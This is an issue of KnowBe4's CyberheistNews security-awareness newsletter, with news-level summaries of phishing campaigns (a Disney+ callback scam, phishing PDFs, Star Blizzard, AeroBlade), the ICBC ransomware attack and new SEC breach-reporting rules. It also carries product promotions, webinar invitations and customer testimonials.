CyberheistNews Vol 13 #50 [Heads Up] Don't Be Fooled by This Sneaky Disney+ Phishing Scam

Cyberheist News

CyberheistNews Vol 13 #50  |   December 12th, 2023

[Heads Up] Don't Be Fooled by This Sneaky Disney+ Phishing ScamStu Sjouwerman SACP

A callback phishing campaign is impersonating Disney+ with phony invoices, according to researchers at Abnormal Security. The phishing emails targeted individuals at 22 organizations.

"The first step in this multi-stage attack is a seemingly auto-generated notification email informing the target of a pending charge for their new Disney+ subscription," the researchers explain.

"The message states that, per the contract signed during the initial registration process, the recipient will be automatically billed on the same day the notification was sent. The email continues by explaining that if the payment is authorized, no further steps are required. However, if the recipient did not approve this transaction, they can contact the support team."

The phony invoice contains the recipient's real name, as well as a phone number for the recipient to call if they want to cancel the subscription.

"Should the recipient call the number, one of two things is likely to happen," the researchers write. "The first is they will be asked to provide sensitive information, such as banking details or login credentials, that the attacker can then use to either complete fraudulent transactions or compromise accounts.

"The other possibility is they will be given instructions for downloading software they are told is necessary to assist with stopping the charge but will actually infect their computer with malware." Notably, the email says they'll be charged $49.99 if they don't dispute the subscription (a real Disney+ subscription costs $13.00 per month).

"By telling the target they are hours away from being charged for an amount that is 3.5x the highest-cost subscription, the attacker increases the likelihood that the recipient will be quick to call the provided number to stop the transaction," the researchers write.

KnowBe4 enables your workforce to make smarter security decisions every day. Over 65,000 organizations worldwide trust the KnowBe4 platform to strengthen their security culture and reduce human risk.

Blog post with links:

Combatting Rogue URL Tricks: Quickly Identify and Investigate the Latest Phishing Attacks

Everyone knows you shouldn't click phishy links. But are your end users prepared to quickly identify the trickiest tactics bad actors use before it's too late? Probably not.

Cybercriminals have moved beyond simple bait and switch domains. They're now employing a variety of advanced social engineering techniques, like sneaky rogue URLs, to entice your users into clicking and putting your network at risk.

Join Roger A. Grimes, KnowBe4's Data-Driven Defense Evangelist, for this webinar as he shows you how to become an expert phish finder. He'll dive deep into the latest techniques and defenses to share:

  • Real-life examples of advanced attacks using rogue digital certificates, homograph attacks and more
  • Safe forensic methods for examining URLs and other tactics for investigating phishy emails
  • Strategies for dissecting URLs on mobile without clicking
  • Simple ways you can train your users to scrutinize URLs and keep your network safe
  • Find out what you need to know to keep your network protected and safe from the latest phishing attacks!

Date/Time: TOMORROW, Wednesday, December 13, @ 2:00 PM (ET)

Can't attend live? No worries — register now and you will receive a link to view the presentation on-demand afterwards.

Save My Spot!

[1 Min Video] New SEC Rules Will Do More Than Result in Quick Breach Reporting

On July 26, the U.S. Security & Exchange Commission (SEC) announced several new cybersecurity rules, taking effect mid-December 2023, that will significantly impact all U.S. organizations (and foreign entities doing business in the U.S.) that must follow SEC regulations.

Although the announcement did not generate a ton of fanfare off the normal business and cybersecurity sites, the rules will greatly increase resource requirements and actions. Some cybersecurity firms are already seeing a significant uptick in new business. Those firms that are paying attention to the new requirements can expect to see a lot of new business opportunities.

What Are the New SEC Rules?

The rule getting the most coverage is the one requiring regulated firms to report significant cyber breaches to the SEC and the public within four days. Per the SEC's official announcement:

"The new rules will require registrants to disclose on the new Item 1.05 of Form 8-K any cybersecurity incident they determine to be material and to describe the material aspects of the incident's nature, scope, and timing, as well as its material impact or reasonably likely material impact on the registrant. An Item 1.05 Form 8-K will generally be due four business days after a registrant determines that a cybersecurity incident is material."

The "materiality" part is important in understanding the new reporting requirement. Materiality is a generally accepted accounting standard that says an event only needs to be reported to stakeholders (i.e., customers, stockholders, regulators, etc.) if omitting it would have had an impact on a decision being made by a reader of that disclosure or of a financial statement. Here are two good summary statements on materiality:

  • Accounting Tools: Materiality principle definition
  • Wall Street Mojo: Materiality Concept

What is or is not considered "material" can change depending on the stakeholders and event. Officially, accounting professionals (e.g., CPAs, etc.) are told there is no particular amount or percentage that makes an event material or not material. When in doubt, follow the standard of "would it matter to a reader of a financial statement."

But in practice, the SEC says the amount involved can be as little as 0.5% - 5% of total assets. It can also be lower or higher. It depends on the event.

KnowBe4 experts explain the latest SEC ruling in one minute. Watch the video:

Blog post with links:

[NEW FEATURE] PhishER Plus and CrowdStrike Falcon Sandbox Integration

Now there's a new, super easy way to protect your users against malicious emails through the power of KnowBe4's PhishER Plus!

PhishER Plus gives you extremely effective capabilities:

Global PhishRIP, a cutting-edge email quarantine feature that automatically removes malicious email before your user is exposed to the threat, and Global Blocklist, an active global threat feed from over 10 million trained users for Microsoft 365.

These are real-world phishing threats, triple-vetted by humans and AI-validated. The result? Your Microsoft 365 email filters get a significant boost, all from within your PhishER console.

With the PhishER Plus and CrowdStrike Falcon Sandbox integration you can streamline your workflow to further analyze user-reported malicious emails without risking your organization's environment.

Join us for a live 30-minute demo of the Plus features of PhishER, the #1 Leader in the G2 Grid Report for SOAR Software.

With PhishER Plus you can:

  • New! Use crowdsourced intelligence from more than 10 million users to block known threats before you're even aware of them
  • New! Automatically isolate and "rip" malicious emails from your users' inboxes that have bypassed mail filters
  • New! Simplify your workflow by analyzing links and attachments with the CrowdStrike Falcon Sandbox integration from a single console
  • New! Leverage the expertise of the KnowBe4 Threat Research Lab to analyze tens of thousands of malicious emails reported by users around the globe per day
  • Automate message prioritization by rules you set and cut through your Incident Response inbox noise to respond to the most dangerous threats quickly

Find out how adding PhishER Plus can be a huge time-saver for your incident response team while ensuring your users are safe!

Date/Time: Wednesday, December 20, @ 2:00 PM (ET)

Save My Spot:

PDFs: Friend or Phishing Foe? Don't Get Caught by the Latest Scam Tactic

Researchers at McAfee warn that attackers are increasingly using PDF attachments in email phishing campaigns. "Over the last four months, McAfee Labs has observed a rising trend in the utilization of PDF documents for conducting a succession of phishing campaigns," the researchers write.

"These PDFs were delivered as email attachments. Attackers favor using PDFs for phishing due to the file format's widespread trustworthiness."

"PDFs, commonly seen as legitimate documents, provide a versatile platform for embedding malicious links, content, or exploits. By leveraging social engineering and exploiting the familiarity users have with PDF attachments, attackers increase the likelihood of successful phishing campaigns.

"Additionally, PDFs offer a means to bypass email filters that may focus on detecting threats in other file formats." Scammers are crafting PDFs that impersonate popular brands in order to deliver malware or trick victims into handing over sensitive information.

"Attackers employ a range of corporate themes in their social engineering tactics to entice victims into clicking on phishing links," McAfee says. "Notable brands such as Amazon, Apple, Netflix, and PayPal, among others, are often mimicked.

"The PDFs are carefully crafted to induce a sense of urgency in the victim's mind, utilizing phrases like 'your account needs to be updated' or 'your ID has expired.' These tactics aim to manipulate individuals into taking prompt action, contributing to the success of the phishing campaigns."

The researchers offer the following advice to help users avoid falling for phishing attacks:

  • "Be Skeptical: Exercise caution when receiving unsolicited emails, messages, or social media requests, especially those with urgent or alarming content."
  • "Verify Sender Identity: Before clicking on any links or providing information, verify the legitimacy of the sender. Check email addresses, domain names, and contact details for any inconsistencies."
  • "Avoid Clicking on Suspicious Links: Hover over links to preview the actual URL before clicking. Be wary of shortened URLs, and if in doubt, verify the link's authenticity directly with the sender or through official channels."
  • "Use Two-Factor Authentication (2FA): Enable 2FA whenever possible. This adds an extra layer of security by requiring a second form of verification, such as a code sent to your mobile device."

Blog post with links:

How Vulnerable is Your Network Against Ransomware and Cryptomining Attacks?

Bad actors are constantly coming out with new versions of ransomware strains to evade detection. Is your network effective in blocking ransomware when employees fall for social engineering attacks?

KnowBe4's Ransomware Simulator "RanSim" gives you a quick look at the effectiveness of your existing network protection. RanSim will simulate 24 ransomware infection scenarios and 1 cryptomining infection scenario to show you if a workstation is vulnerable.

Here's how RanSim works:

  • 100% harmless simulation of real ransomware and cryptomining infections
  • Does not use any of your own files
  • Tests 25 types of infection scenarios
  • Just download the installer and run it

Results in a few minutes!

This is complementary and will take you five minutes max. RanSim may give you some insights about your endpoint security you never expected!

Get RanSim Now!

Insidious Russian FSB Spear Phishing Campaign Targets Personal Email Addresses

A name that has recently garnered significant attention is Star Blizzard, a spear phishing operation linked to the Russian Federal Security Service (FSB).

According to a joint advisory by the Five Eyes intelligence alliance, Star Blizzard has been actively targeting personal email addresses since 2019. This preference for personal over organizational or corporate addresses suggests a strategy to exploit weaker security controls.

The modus operandi of Star Blizzard is particularly insidious. The campaign begins with emails that are seemingly benign, tailored to the recipient's interests to build trust and rapport. It's only after establishing a connection with the target that Star Blizzard escalates its tactics, sharing links that lead to FSB-controlled servers.

These servers display pages mimicking legitimate services, luring victims into entering their account credentials, which are then compromised.

The impact of this spear phishing campaign is not just limited to the initial target. Once Star Blizzard gains access to an individual's email and contacts list, it uses this information to launch further attacks, expanding its web of deception and manipulation.

This approach mirrors techniques traditionally used by intelligence services in agent recruitment, but adapted for the digital realm.

The primary focus of Star Blizzard has been on the UK and the U.S., with additional attention paid to other NATO countries and regions in Russia's sphere of influence. The targets? Academia, defense, governmental organizations, NGOs, think tanks, and politicians. The Wall Street Journal notes that the public identification of the FSB's involvement is aimed at hindering their ability to sway elections in Western democracies.

Despite dismissals by the Russian embassy in London, the operation's objectives are significant. Reports indicate that Star Blizzard is not just engaged in intelligence gathering but also aims to disrupt investigations into Russian war crimes in Ukraine.

As cybersecurity threats become more sophisticated and targeted, understanding the tactics and motivations of groups like Star Blizzard is crucial.

[Budget Ammo] Need KnowBe4 Customer Reviews From Your Own Industry?

We're happy to publish a new page with links to hundreds of validated customer reviews at the G2 site where you can now find dozens organized by industry. This is super handy when you need to submit budget approval and purchasing requires legit industry references.

Go here and have a quick look at reviews from your peers:

Let's stay safe out there.

Warm Regards,

Stu Sjouwerman, SACP
Founder and CEO
KnowBe4, Inc.

PS: Check out the new multimodal AI model from Google called Gemini. Edited, but still impressive:

PPS: Yours Truly in FastCompany - AI: Cybersecurity threat or opportunity?:

Quotes of the Week  
"Three rules for a career: 1) Don't sell anything you wouldn't buy yourself; 2) Don't work for anyone you don't respect and admire; and 3) Work only with people you enjoy."
- Charlie Munger (January 1, 1924 – November 28, 2023)

"This is a good life lesson: getting the right people into your system is the most important thing you can do."
- Charlie Munger (January 1, 1924 – November 28, 2023)

Thanks for reading CyberheistNews

You can read CyberheistNews online at our Blog

Security News

AeroBlade's Commercial Cyber Espionage

Researchers at BlackBerry are tracking a previously unobserved threat actor dubbed "AeroBlade" that's launching phishing attacks against organizations in the U.S. aerospace industry. The threat actor is sending malicious documents to trick employees into installing malware.

"When opened, the document displays text in a deliberately scrambled font, along with a 'lure' message asking the potential victim to click it to enable the content in MS Office," the researchers write. "The docx document employs remote template injection…to download the second stage of the infection.

"The next-stage information is saved in an XML (eXtensible Markup Language) file inside a .dotm file....Once the victim opens the file and executes it by manually clicking the 'Enable Content' lure message, the [redacted].dotm document discretely drops a new file to the system, and opens it.

"The newly downloaded document is readable, leading the victim to believe that the file initially received by email is legitimate. In fact, it's a classic cyber bait-and-switch, performed invisibly right under the victim's nose."

The researchers don't know who AeroBlade is working for, but they believe the threat actor is conducting commercial cyberespionage.

"Given the relatively sophisticated technical capabilities this threat actor deployed and the victim's timelines, we conclude with a high degree of confidence that this was a commercial cyberespionage campaign," BlackBerry says. "Its purpose was most likely to gain visibility over the internal resources of its target in order to weigh its susceptibility to a future ransom demand."

The researchers add, "Based on the threat actor's operations timelines we can surmise that this shows the group's interest in the target remained consistent between the first and second campaign, as evidenced by the increased complexity of the second campaign compared to the first.

"During the time that elapsed between the two campaigns we observed, the threat actor put considerable effort into developing additional resources to ensure they could secure access to the sought-after information, and that they could exfiltrate it successfully."

KnowBe4 enables your workforce to make smarter security decisions every day. Over 65,000 organizations worldwide trust the KnowBe4 platform to strengthen their security culture and reduce human risk.

BlackBerry has the story:

New York Unit of World's Largest Bank Becomes Ransomware Victim

The ransomware attack on ICBC Financial Services caused disruption of trading of U.S. Treasuries and marked a new level of breach that could have massive repercussions.

When we saw the attack on the Colonial Pipeline back in 2021, the impact was felt throughout the Southeast United States. Any attack on key businesses that keeps an economy running will have some form of impact should the attack be successful.

And that's exactly what happened when the Industrial and Commercial Bank of China's New York unit responsible for ensuring brokers' trades and transactions in U.S. Treasuries went through.

While not much is known about the specifics of the attack, according to the Wall Street Journal, ICBC had to disconnect affected systems and was unplugged from the Treasury. Any trades placed had to be manually cleared.

This kind of attack signals that despite banks feeling like they may be impenetrable due to concerted cybersecurity efforts, they can still become a victim. The implications are that it's possible for entire markets to come to a halt from a single cyber attack.

According to recent industry data, the financial services market saw a 121% increase in phishing attacks in Q3 of this year. This indicates a massive focus on increased attacks on this industry from bad actors. While security solutions will stop a material amount of attacks, many phishing attacks still make their way to your users' Inbox.

This will require your users to become part of your organization's security stance – something taught through new-school security awareness training. KnowBe4 enables your workforce to make smarter security decisions every day. Over 65,000 organizations worldwide trust the KnowBe4 platform to strengthen their security culture and reduce human risk.

Blog post with links:

What KnowBe4 Customers Say

"Christian M. has been such a pleasure to work with and is the most amazing Customer Success Manager we have ever had. Please take care of him as he is a great employee. Thank you and have a great day."

S.G., Information Systems Security Specialist

"Dear Mr. Sjouwerman, I am writing to express my sincere appreciation for your incredible team of employees at Knowbe4! Specifically, I would like to recognize Nichol W. for the outstanding customer service she provides to our Credit Union. Nichol is very knowledgeable and genuinely interested in making sure customers take full advantage of all included benefits. We are very grateful to have Nichol as our Customer Success Manager, as she has made navigating the Knowbe4 platform and campaigns effortless. Please do not let her efforts go unnoticed.

Thank you for hiring such a great team of individuals that make your customers feel respected and valued."

- R.J., VP of Information Systems

The 10 Interesting News Items This Week
  1. CISA summary report on Russian APT and how they use long-term social engineering to achieve their goals:

  2. U.S. charges two Russians in hacks of government accounts:

  3. Kremlin-backed hackers attacking unpatched Outlook systems, Microsoft says:

  4. New AeroBlade hackers target aerospace sector in the U.S.:

  5. Due to AI, "We are about to enter the era of mass spying," says Bruce Schneier:

  6. Police Arrest 1000 Suspected Money Mules:

  7. UK wants to block all Social Media Scams:

  8. Disruptive new wave of ransomware hits critical infrastructure:

  9. OCR Imposes First HIPAA Penalty for a Phishing Attack:

  10. U.S. and U.K. Accuse Russia of Global Hacking Spree Targeting British Elections:

Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

Topics: Cybercrime, KnowBe4

Subscribe to Our Blog

Comprehensive Anti-Phishing Guide

Get the latest about social engineering

Subscribe to CyberheistNews